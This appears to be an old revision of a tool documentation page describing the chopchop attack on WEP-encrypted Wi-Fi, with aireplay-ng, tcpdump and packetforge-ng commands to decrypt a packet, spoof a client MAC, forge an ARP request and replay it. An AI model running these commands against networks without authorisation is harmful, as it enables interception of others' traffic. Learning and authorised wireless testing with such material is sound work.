This is an old revision of the document!
This attack, when successful, can decrypt a WEP data packet without knowing the key. It can even work against dynamic WEP. This attack does not recover the WEP key itself, but merely reveals the plaintext. However, some access points are not vulnerable at all. Some may seem vulnerable at first but actually drop data packets shorter that 60 bytes. If the access point drops packets shorter than 42 bytes, aireplay tries to guess the rest of the missing data, as far as the headers are predictable. If an IP packet is captured, it additionally checks if the checksum of the header is correct after guessing the missing parts of it. This attack requires at least one WEP data packet.
1. First, we decrypt one packet
aireplay-ng -4 ath0
If this isn't successful, in most cases the access point just drops the data because it does not know the MAC which is sending it. In this case we have to use the MAC adress of a connected client which is allowed to send data over the network:
aireplay-ng -4 -h 00:09:5B:EB:C5:2B ath0
2. Let's have a look at the IP address
tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap reading from file replay_dec-0627-022301.cap, link-type [...] IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1
3. Then, forge an ARP request The source IP (192.168.1.100) doesn't matter, but the destination IP (192.168.1.2) must respond to ARP requests. The source MAC must belong to an associated station, in case the access point is filtering unauthenticated traffic.
packetforge-ng replay_dec-0627-022301.xor 1 00:13:10:30:24:9C 00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap
4. And replay our forged ARP request
aireplay-ng -2 -r arp.cap ath0